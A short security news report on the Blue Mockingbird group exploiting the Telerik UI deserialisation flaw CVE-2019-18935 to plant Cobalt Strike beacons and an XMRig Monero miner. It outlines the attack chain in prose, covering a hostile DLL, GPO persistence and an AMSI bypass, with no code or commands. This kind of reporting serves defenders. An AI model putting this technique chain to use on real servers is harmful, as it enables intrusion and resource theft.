A malicious threat group called Blue Mockingbird has targeted the Telerik UI flaws to infect its servers, mine Monero by hacking system resources, and install Cobalt Strike beacons. The CVE-2019-18935 is the deserialisation critical flaw leveraged by the threat actors, which leads to an RCE in the Telerik UI library.
To exploit the critical vulnerability, the adversaries must obtain the encryption keys that protect Telerik UI’s serialisation on the target. This acquisition is achievable by using another flaw in the target web app or a couple more.
Researchers noted that several valid targets are available for exploitation since many web applications, including projects in the Telerik UI framework versions. Some of these apps are available during the developmental stage of Telerik, which were discontinued or forgotten.
Once the hackers obtain the encryption keys, they can compile a hostile DLL that contains code to be run during the deserialisation and operate it within the context of the ‘w3wp.exe’ process.
In the recent campaign, the Blue Mockingbird group used a prepared PoC exploit, which handles the encryption logic and automates the DLL compilation.
In addition, the payload used by the threat actors in the recent attacks is a Cobalt Strike beacon and an authentic penetration testing feature for running encrypted PowerShell commands.
For the persistence, the group established an Active Directory Group Policy Objects, which develops scheduled tasks written in a new registry key that includes base64-encoded PowerShell.
The script also utilises common AMSI-bypassing strategies to avoid Windows Defender detection. The group also uses the bypassing technique for downloading and loading a Cobalt Strike DLL onto memory.
Furthermore, the second-stage executable is an XMRig Miner and a standard open-source cryptominer for mining Monero. The researchers noticed that mining was the original plan of the threat group in 2020, and not much has changed.
Unfortunately, the launch of Cobalt Strike paves the way to an effortless lateral movement within the infected network, account takeover, and data exfiltration. This exploit can also open the door for the Blue Mockingbird group to deploy another ransomware.
